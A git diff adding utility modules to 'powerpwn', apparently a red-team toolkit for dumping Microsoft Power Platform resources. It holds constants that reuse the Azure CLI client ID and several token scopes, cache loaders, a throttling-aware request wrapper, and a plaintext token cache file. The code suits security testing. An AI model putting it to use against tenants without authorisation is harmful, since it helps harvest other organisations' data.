msal.PublicClientApplication(AZURE_CLI_APP_ID, app_name=TOOL_NAME) diff --git a/src/powerpwn/powerdump/utils/const.py b/src/powerpwn/powerdump/utils/const.py new file mode 100644 index 0000000..e668b8d --- /dev/null +++ b/src/powerpwn/powerdump/utils/const.py @@ -0,0 +1,9 @@ +CACHE_PATH = ".cache" +DATA_MODEL_FILE_EXTENSION = ".json" +SPEC_JWT_NAME = "ApiHubBearerAuth" +DATA_MODEL_VERSION = "0.0.1" +POWER_APPS_SCOPE = "https://service.powerapps.com/.default" +API_HUB_SCOPE = "https://apihub.azure.com/.default" +AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46" +GRAPH_API_SCOPE = "https://graph.microsoft.com/.default" +ENCODING = "UTF8" diff --git a/src/powerpwn/powerdump/utils/json_utils.py b/src/powerpwn/powerdump/utils/json_utils.py new file mode 100644 index 0000000..3e92eb2 --- /dev/null +++ b/src/powerpwn/powerdump/utils/json_utils.py @@ -0,0 +1,114 @@ +""" +Copied from AFK +""" + +import json +import logging +from typing import Any, Callable, Dict, List, Optional, Tuple, Union + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.base_entity import BaseEntity + +logger = logging.getLogger(LOGGER_NAME) + + +def _flatten_nested_dict(val: Any, prefix: str = "") -> List[Tuple[Any, Any]]: + res = [] + if isinstance(val, (str, int, float, bool)) or val is None: + res.append((val, prefix)) + elif isinstance(val, dict): + for k in val.keys(): + res.extend(_flatten_nested_dict(val[k], f"{prefix}.{k}")) + elif isinstance(val, (list, tuple)): + for i in range(len(val)): + res.extend(_flatten_nested_dict(val[i], f"{prefix}.{i}")) + elif isinstance(val, BaseEntity): + res.extend(_flatten_nested_dict(json.loads(val.json()), prefix)) + else: + raise ValueError(f"Unsupported type {type(val)}.") + return res + + +def flatten_nested_dict(val: Any) -> Dict[Any, Any]: + """ + Flatten nested dict recursively + @param val: nested dict + @return: flattened dict + """ + res = _flatten_nested_dict(val) + return {key: val for val, key in res} + + +def deep_compare_nested_dict(val_one: Any, val_two: Any, allow_additional_keys: bool = False) -> bool: + """ + Compare nested dict recursively + @param val_one: first nested dict + @param val_two: second nested dict + @param allow_additional_keys: if True, val_one and val_two are allowed to contains nested properties that are not present in the other. + @return: whether the two dicts are equal in all nested properties + """ + val_one_flat = flatten_nested_dict(val_one) + val_two_flat = flatten_nested_dict(val_two) + + val_one_key_set = set(val_one_flat.keys()) + val_two_key_set = set(val_two_flat.keys()) + + missing_key_from_val_one = val_one_key_set.difference(val_two_key_set) + if len(missing_key_from_val_one) > 0: + logger.debug(f"val_two is missing the following elements from val_one: {missing_key_from_val_one}.") + if not allow_additional_keys: + return False + + missing_key_from_val_two = val_two_key_set.difference(val_one_key_set) + if len(missing_key_from_val_two) > 0: + logger.debug(f"val_one is missing the following elements from val_two: {missing_key_from_val_two}.") + if not allow_additional_keys: + return False + + mutual_keys = val_one_key_set.intersection(val_two_key_set) + for k in mutual_keys: + # pydantic and json load can change type of int, bool and more from str + if not json_consistent_compare(val_one_flat[k], val_two_flat[k]): + logger.debug(f"Value for key {k} does not align.") + return False + + return True + + +def json_consistent_compare(val_one: Optional[Union[str, int, bool, float]], val_two: Optional[Union[str, int, bool, float]]) -> bool: + """ + Compares values in a way consistent with json dump and load. + I.e, json_consistent_compare(val, json.loads(json.dumps(val))) is True. + @param val_one: value to compare. + @param val_two: value to compare. + @return: whether the two values are equal in a way consistent with json dump and load. + """ + if isinstance(val_one, type(val_two)) or isinstance(val_one, bool) or isinstance(val_two, bool): + return val_one == val_two + elif isinstance(val_one, str) or isinstance(val_two, str): + return str(val_one) == str(val_two) + elif isinstance(val_one, str) or isinstance(val_two, str): + return str(val_one) == str(val_two) + elif isinstance(val_one, int) and isinstance(val_two, float): + return float(val_one) == val_two + elif isinstance(val_two, int) and isinstance(val_one, float): + return float(val_two) == val_one + else: + raise ValueError(f"Unsupported type combination {type(val_one)}, {type(val_one)}.") + + +def change_obj_recu(val: Any, obj_changer: Callable[[dict], None]) -> None: + if isinstance(val, (str, int, float, bool)) or val is None: + return + elif isinstance(val, dict): + obj_changer(val) + + for k in val.keys(): + change_obj_recu(val[k], obj_changer=obj_changer) + elif isinstance(val, (list, tuple)): + for i in range(len(val)): + change_obj_recu(val[i], obj_changer=obj_changer) + elif isinstance(val, BaseEntity): + change_obj_recu(val.json(), obj_changer=obj_changer) + else: + raise ValueError(f"Unsupported type {type(val)}.") diff --git a/src/powerpwn/powerdump/utils/model_loaders.py b/src/powerpwn/powerdump/utils/model_loaders.py new file mode 100644 index 0000000..12adc4a --- /dev/null +++ b/src/powerpwn/powerdump/utils/model_loaders.py @@ -0,0 +1,109 @@ +import json +import os +import pathlib +from typing import Dict, Generator, List, Optional, Tuple + +from powerpwn.powerdump.collect.models.canvas_app_entity import CanvasApp +from powerpwn.powerdump.collect.models.connection_entity import Connection +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.path_utils import entities_path, env_entity_type_path + + +def load_resources(cache_path: str, env_id: Optional[str] = None) -> Generator[ResourceEntityBase, None, None]: + yield from load_connections(cache_path, env_id) + yield from load_canvasapps(cache_path, env_id) + yield from load_connectors(cache_path, env_id) + + +def load_connections(cache_path: str, env_id: Optional[str] = None) -> Generator[Connection, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + connections = cache.glob(f"{env_id}/{ResourceType.connection}/*.json") + else: + connections = cache.glob(f"*/{ResourceType.connection}/*.json") + for connection in connections: + connection_path = "/".join(list(connection.parts)) + with open(connection_path, "r") as fp: + raw_connection = json.load(fp) + parsed_connection = Connection.parse_obj(raw_connection) + yield parsed_connection + + +def load_canvasapps(cache_path: str, env_id: Optional[str] = None) -> Generator[CanvasApp, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + apps = cache.glob(f"{env_id}/{ResourceType.canvas_app}/*.json") + else: + apps = cache.glob(f"*/{ResourceType.canvas_app}/*.json") + for app in apps: + canvasapps_path = "/".join(list(app.parts)) + with open(canvasapps_path, "r") as fp: + raw_app = json.load(fp) + parsed_app = CanvasApp.parse_obj(raw_app) + yield parsed_app + + +def get_canvasapp(cache_path: str, env_id: str, app_id: str) -> CanvasApp: + canvas_apps_in_env_path = env_entity_type_path(env_id, ResourceType.canvas_app, cache_path) + app_path = pathlib.Path(f"{canvas_apps_in_env_path}/{app_id}.json") + with open(app_path, "r") as fp: + raw_app = json.load(fp) + return CanvasApp.parse_obj(raw_app) + + +def get_connection(cache_path: str, env_id: str, connection_id: str) -> Connection: + canvas_apps_in_env_path = env_entity_type_path(env_id, ResourceType.connection, cache_path) + app_path = pathlib.Path(f"{canvas_apps_in_env_path}/{connection_id}.json") + with open(app_path, "r") as fp: + raw_app = json.load(fp) + return Connection.parse_obj(raw_app) + + +def get_connector(cache_path: str, env_id: str, api_name: str) -> Connector: + connectors_path = env_entity_type_path(env_id, ResourceType.connector, cache_path) + with open(os.path.join(connectors_path, api_name + ".json")) as fp: + spec = Connector.parse_obj(json.load(fp)) + return spec + + +def load_connectors(cache_path: str, env_id: Optional[str] = None) -> Generator[Connector, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + connectors = cache.glob(f"{env_id}/{ResourceType.connector}/*.json") + else: + connectors = cache.glob(f"*/{ResourceType.connector}/*.json") + + for connector in connectors: + connector_file = "/".join(list(connector.parts)) + with open(connector_file, "r") as fp: + raw_spec = json.load(fp) + parsed_spec = Connector.parse_obj(raw_spec) + yield parsed_spec + + +def get_environment_ids(cache_path: str) -> List[str]: + return os.listdir(entities_path(cache_path)) + + +def map_connection_id_to_connector_id_and_env_id(connections: Generator[Connection, None, None]) -> Dict[str, Tuple[str, str]]: + connection_id_to_connector_id_and_env_id: Dict[str, Tuple[str, str]] = dict() + for connection in connections: + connection_id_to_connector_id_and_env_id[connection.connection_id] = connection_id_to_connector_id_and_env_id.get( + connection.connection_id, (connection.connector_id, connection.environment_id) + ) + + return connection_id_to_connector_id_and_env_id + + +def map_connector_id_and_env_id_to_connection_ids(connections: Generator[Connection, None, None]) -> Dict[Tuple[str, str], List[str]]: + connector_id_and_env_id_to_connection_ids: Dict[Tuple[str, str], List[str]] = dict() + for connection in connections: + if connection.environment_id.startswith("default"): + connection.environment_id = connection.environment_id.replace("default", "Default") + connector_id_and_env_id_to_connection_ids[ + (connection.connector_id, connection.environment_id) + ] = connector_id_and_env_id_to_connection_ids.get((connection.connector_id, connection.environment_id), []) + [connection.connection_id] + + return connector_id_and_env_id_to_connection_ids diff --git a/src/powerpwn/powerdump/utils/path_utils.py b/src/powerpwn/powerdump/utils/path_utils.py new file mode 100644 index 0000000..c8aa6c6 --- /dev/null +++ b/src/powerpwn/powerdump/utils/path_utils.py @@ -0,0 +1,30 @@ +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.const import CACHE_PATH + + +def entities_path(cache_path: str = CACHE_PATH) -> str: + return f"{cache_path}/resources" + + +def env_entities_path(env_id: str, cache_path: str = CACHE_PATH) -> str: + return f"{cache_path}/resources/{env_id}" + + +def env_entity_type_path(env_id: str, entity_type: ResourceType, cache_path: str = CACHE_PATH) -> str: + return f"{cache_path}/resources/{env_id}/{entity_type.value}" + + +def dump_path(cache_path: str = CACHE_PATH) -> str: + return f"{cache_path}/dump" + + +def collected_data_path(cache_path: str = CACHE_PATH) -> str: + return f"{cache_path}/data" + + +def env_collected_data_path(env_id: str, cache_path: str = CACHE_PATH) -> str: + return f"{collected_data_path(cache_path)}/{env_id}" + + +def resource_collected_data_path(env_id: str, resource_id: str, resource_type: ResourceType, cache_path: str = CACHE_PATH) -> str: + return f"{env_collected_data_path(env_id, cache_path)}/{resource_type}/{resource_id}" diff --git a/src/powerpwn/powerdump/utils/requests_wrapper.py b/src/powerpwn/powerdump/utils/requests_wrapper.py new file mode 100644 index 0000000..43965bf --- /dev/null +++ b/src/powerpwn/powerdump/utils/requests_wrapper.py @@ -0,0 +1,88 @@ +import logging +import time +from typing import Any, Dict, List, Optional + +import requests + +from powerpwn.const import LOGGER_NAME, TOOL_NAME + +logger = logging.getLogger(LOGGER_NAME) + + +def init_session(token: str) -> requests.Session: + session = requests.Session() + session.headers = {"accept": "application/json", "Authorization": token, "User-Agent": TOOL_NAME} + return session + + +def consecutive_gets( + session: requests.Session, + expected_status_prefix: str = "200", + property_to_extract_data: str = "value", + property_for_pagination: str = "continuationToken", + **kwargs, +): + value: List[Dict[str, Any]] = [] + success = False + cont_token = "" # nosec + + resp_obj = {property_for_pagination: "NOT_EMPTY"} + while resp_obj.get(property_for_pagination) not in (None, cont_token): + cont_token = resp_obj.get(property_for_pagination, "") + + success, _, resp_obj = request_and_verify(session=session, expected_status_prefix=expected_status_prefix, method="get", **kwargs) + if not success: + break + + if property_to_extract_data not in resp_obj and value != []: + raise ValueError("Inconsistent responses.") + if property_to_extract_data not in resp_obj and value == []: + logger.warning(f"Expected an array response, received an object: {resp_obj}. Request: {kwargs}.") + success = True + value += [resp_obj] + else: + success = True + value += resp_obj[property_to_extract_data] + + return success, value + + +def request_and_verify(session: requests.Session, expected_status_prefix: str = "200", is_json_resp: bool = True, **kwargs): + success = False + resp_obj = None + resp_head = None + + logger.debug(f"Triggering request ({kwargs}).") + resp = session.request(**kwargs) + resp_obj = __get_resp_obj(resp) if is_json_resp else resp.text + if str(resp.status_code).startswith(expected_status_prefix): + resp_head = resp.headers + success = True + else: + if resp.status_code == 429: + __handle_throttling(resp_obj) + return request_and_verify(session, expected_status_prefix, **kwargs) + logger.info(f"Failed at request ({kwargs}) with status_code={resp.status_code} and content={str(resp.content)}.") + + return success, resp_head, resp_obj + + +def __get_resp_obj(resp) -> Optional[Dict]: + resp_obj = None + try: + resp_obj = resp.json() + except requests.exceptions.JSONDecodeError: + return None + + return resp_obj + + +def __handle_throttling(resp_obj) -> None: + message = resp_obj.get("message", "") if resp_obj else "" + throttling_message_prefix = "Rate limit is exceeded. Try again in " + if throttling_message_prefix in message: + seconds_to_wait = int(message.partition(throttling_message_prefix)[2].partition(" seconds")[0]) + logger.info(f"API throttled, going to sleep {seconds_to_wait + 1} before retry") + time.sleep(seconds_to_wait + 1) + else: + time.sleep(20) diff --git a/src/powerpwn/powerdump/utils/token_cache.py b/src/powerpwn/powerdump/utils/token_cache.py new file mode 100644 index 0000000..f795e5b --- /dev/null +++ b/src/powerpwn/powerdump/utils/token_cache.py @@ -0,0 +1,42 @@ +import json +import os +from typing import Dict, List, NamedTuple, Optional + +TOKEN_CACHE_PATH = os.path.join(os.getcwd(), "tokens.json") + + +class TokenCache(NamedTuple): + token_key: str + token_val: str + + +def put_token(token_to_cache: TokenCache) -> None: + put_tokens([token_to_cache]) + + +def try_fetch_token(token_type: str) -> Optional[str]: + if not os.path.exists(TOKEN_CACHE_PATH): + return None + + tokens = __load_tokens() + return tokens.get(token_type) + + +def put_tokens(tokens: List[TokenCache]) -> None: + cached_tokens = {} + if os.path.exists(TOKEN_CACHE_PATH): + # json.load fails on "w+" permission + cached_tokens = __load_tokens() + f = open(TOKEN_CACHE_PATH, "w") + for token in tokens: + cached_tokens[token.token_key] = token.token_val + f.write(json.dumps(cached_tokens, indent=4)) + f.close() + + +def __load_tokens() -> Dict[str, str]: + with open(TOKEN_CACHE_PATH) as file: + try: + return json.load(file) + except json.decoder.JSONDecodeError: + return {}